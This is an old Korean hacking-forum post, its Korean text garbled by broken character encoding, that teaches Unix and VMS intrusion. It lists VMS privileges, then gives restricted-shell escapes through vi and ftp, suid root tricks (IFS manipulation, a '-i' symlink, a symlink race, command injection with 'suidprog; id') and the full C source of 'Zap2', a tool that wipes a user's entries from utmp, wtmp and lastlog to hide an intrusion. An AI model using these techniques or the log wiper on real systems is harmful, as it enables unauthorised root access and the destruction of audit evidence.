Hacking °ü·Ã °Ô½ÃÆÇ |
---|
2000/08/06(21:33) from 203.255.160.61 | |
ÀÛ¼ºÀÚ : °ÁÙ±â (jkkang65@hanmail.net) | Á¶È¸¼ö : 4422 , ÁÙ¼ö : 356 |
[°ÁÂ] À¯´Ð½º¿¡¼ ÇØÅ·Çϱâ - [2] ÆÛ¿Â±Û |
---|
VMS¿¡¼ÀÇ ±ÇÇÑÀº ¾î¶² °ÍÀÌ ÀÖ³ª? ACNT Allows you to restrain accounting messages ALLSPOOL Allows you to allocate spooled devices ALTPRI Allot Priority. This allows you to set any priority value BUGCHK Allows you make bug check error log entries BYPASS Enables you to disregard protections CMEXEC/ CMKRNL Change to executive or kernel mode. These privileges allow a process to execute optional routines with KERNEL and EXECUTIVE access modes. CMKRNL is the most powerful privilege on VMS as anything protected can be accessed if you have this privilege. You must have these privileges to gain access to the kernel data structures directly. DETACH This privilege allow you to create detached processes of arbitrary UICs DIAGNOSE With this privilege you can diagnose devices EXQUOTA Allows you to exceed your disk quota GROUP This privilege grants you permission to affect other processes in the same rank GRPNAM Allows you to insert group logical names into the group logical names table. GRPPRV Enables you to access system group objects through system protection field LOG_IO Allows you to issue logical input output requests MOUNT May execute the mount function NETMBX Allows you to create network connections OPER Allows you to perform operator functions PFNMAP Allows you to map to specific physical pages PHY_IO Allows you to perform physical input output requests PRMCEB Can create permanent common event clusters PRMGBL Allows you to create permanent global sections PRMMBX Allows you to create permanent mailboxes PSWAPM Allows you to change a processes swap mode READALL Allows you read access to everything SECURITY Enables you to perform security related functions SETPRV Enable all privileges SHARE Allows you to access devices allocated to other users. This is used to assign system mailboxes. SHMEM Enables you to modify objects in shared memory SYSGBL Allows you to create system wide permanent global sections SYSLCK Allows you to lock system wide resources SYSNAM Allows you to insert in system logical names in the names table. SYSPRV If a process holds this privilege then it is the same as a process holding the system user identification code. TMPMBX Allows you create temporary mailboxes VOLPRO Enables you to override volume protection WORLD When this is set you can affect other processes in the world ÇÁ·Î¼¼½º°¡ ¾î¶² ±ÇÇÑÀ¸·Î ¼öÇàÇÏ°í ÀÖ´ÂÁö ¾Ë±â À§Çؼ ´ÙÀ½°ú °°Àº ¸í·ÉÀ» »ç¿ëÇÑ´Ù. $ show /proc/priv Á¦ÇÑµÈ ½©¿¡¼ ¾î¶»°Ô ºüÁ® ³ª¿À³ª? À߸ø ÀÛ¼ºÇÑ Á¦ÇÑ ½©¿¡¼´Â ½©¿¡¼ »ç¿ëÇÏ´Â ±â´ÉÀ» °¡Áø ÇÁ·Î±×·¥À» ¼öÇàÇÔÀ¸ ·Î¼ ºüÁ®³ª¿Ã ¼ö ÀÖ´Ù. ÁÁÀº ¿¹°¡ viÀÌ´Ù. vi¸¦ ¼öÇàÇÒ ¶§ ´ÙÀ½°ú °°Àº ¸í·É À» ÀÌ¿ëÇ϶ó. :set shell=/bikn/sh ±×¸®°í ³ª¼ ´ÙÀ¸¸ð°¡ °°Àº ¸í·ÉÀ» ÀÌ¿ëÇÏ¿© ½©À» ¾ò´Â´Ù. : shell Á¦ÇÑ ½©¿¡¼ "cd" ¸í·ÉÀ» »ç¿ëÇÒ ¼ö ¾øµµ·Ï ÇÑ´Ù¸é ±× °èÁ¤À¸·Î ftp¸¦ Çϸé cd¸¦ ÇÒ ¼ö ÀÖ´Ù. suid ½ºÅ©¸³Æ®³ª ÇÁ·Î±×·¥¿¡¼ ¾î¶»°Ô rootÀÇ ±ÇÇÑÀ» ¾òÀ» ¼ö ÀÖ³ª? 1. ÇÁ·Î±×·¥¿¡¼ system()À» ÀÌ¿ëÇÏ¿© ´Ù¸¥ ÇÁ·Î±×·¥À» ºÎ¸¥´Ù.¸é, IFS¸¦ º¯ °æÇÏ¿© ±× ÇÁ·Î±×·¥À» ¿ì·ÕÇÒ ¼ö ÀÖ´Ù. IFS´Â ³»ºÎ ÇÊµå ±¸ºÐÀÚ(Internal Field Separator)ÀÇ ¾àÀڷμ ½©¿¡¼ Àμö¸¦ ±¸ºÐÇÏ´Â ¹®Àڷμ »ç¿ëÇÏ´Â °Í ÀÌ´Ù. ÇÁ·Î±×·¥¿¡ ´ÙÀ½°ú °°Àº °ÍÀÌ Æ÷ÇԵȴٰí ÇÏÀÚ. system("bin/data") ±×¸®°í IFS¸¦ '/'·Î º¯°æÇÏ¸é ½©Àº ¸í·ÉÀ» ´ÙÀ½°ú °°ÀÌ ¹ø¿ªÇÑ´Ù. bin date ÀÌÁ¦, ÇÁ·Î±×·¥ Áß¿¡ binÀ̶ó´Â °ÍÀÌ °æ·Î(path)Áß¿¡ ÀÖ´Ù¸é, suid ÇÁ·Î±×·¥ Àº /bin/date ÇÁ·Î±×·¥ ´ë½Å binÀ̶ó´Â ÇÁ·Î±×·¥À» ¼öÇàÇÏ°Ô µÈ´Ù. IFS¸¦ ¹Ù²Ù±â À§Çؼ, ´ÙÀ½°ú °°Àº ¸í·ÉÀ» ÀÌ¿ëÇÑ´Ù. IFS='/'; export IFS setenv IFS '/' export IFS='/' 2. ½ºÅ©¸³Æ®¸¦ -i·Î ¿¬°á(link)ÇÑ´Ù. "-i"¶ó´Â ÇÁ·Î±×·¥À» ¸¸µé¾î ½Éº¼¸¯ ¸µÅ©(symbolic link)¸¦ ¸¸µç´Ù. "-i"¸¦ ¼öÇàÇÏ¸é ½©(/bin/sh)ÀÌ »óÈ£ÀÛ¿ë(interactive) ¸ðµå°¡ µÇ°Ô ÇÑ´Ù. ÀÌ ¹æ¹ý Àº suid(set uid)µÇ¾î ÀÖ´Â ½ºÅ©¸³Æ®¿¡¼¸¸ »ç¿ë°¡´ÉÇÏ´Ù. ¿¹: % ln suid.sh -i % -i # 3. °æÀï Á¶°ÇÀ» ÀÌ¿ëÇÑ´Ù. Ä¿³Î¿¡¼ /bin/sh¸¦ ·ÎµåÇÒ ¶§ ´Ù¸¥ ÇÁ·Î±×·¥À¸·Î ÇÁ·Î±×·¥¿¡ ´ëÇÑ ½Éº¼¸¯ ¸µ Å©¸¦ ¹Ù²Û´Ù. ¿¹: nice -19 suidprog; ln -s evilprog suidroot 4. ÇÁ·Î±×·¥¿¡ À߸øµÈ ÀÔ·ÂÀ» º¸³½´Ù. ÇÁ·Î±×·¥°ú ´Ù¸¥ ¸í·ÉÀ» ÇÑ Ä¿¸Çµå ¶óÀο¡¼ ¼öÇàÇÑ´Ù. ¿¹: suidprog; id ½Ã½ºÅÛ ·Î±×¿¡¼ ³» Á¸À縦 ¾ø¾Ö´Â ¹æ¹ýÀº? /etc/utmp, /usr/adm/wtmp¿Í /usr/adm/lastlog ÆÄÀÏÀ» º¯°æÇÑ´Ù. À̰͵é Àº ÅؽºÆ® ÆÄÀÏÀÌ ¾Æ´Ï¶ó¼ vi·Î ÆíÁýÇÒ ¼ö ¾ø´Ù. Ưº°ÇÑ ¸ñÀûÀ» Áö´Ñ ÇÁ·Î±× ·¥À» ÀÛ¼ºÇØ¾ß ÇÑ´Ù. ¿¹: #include #include #include #include #include #include #include #include #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos = -1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, &utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L; } } close(f); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!n"); } else printf("Error.n"); } |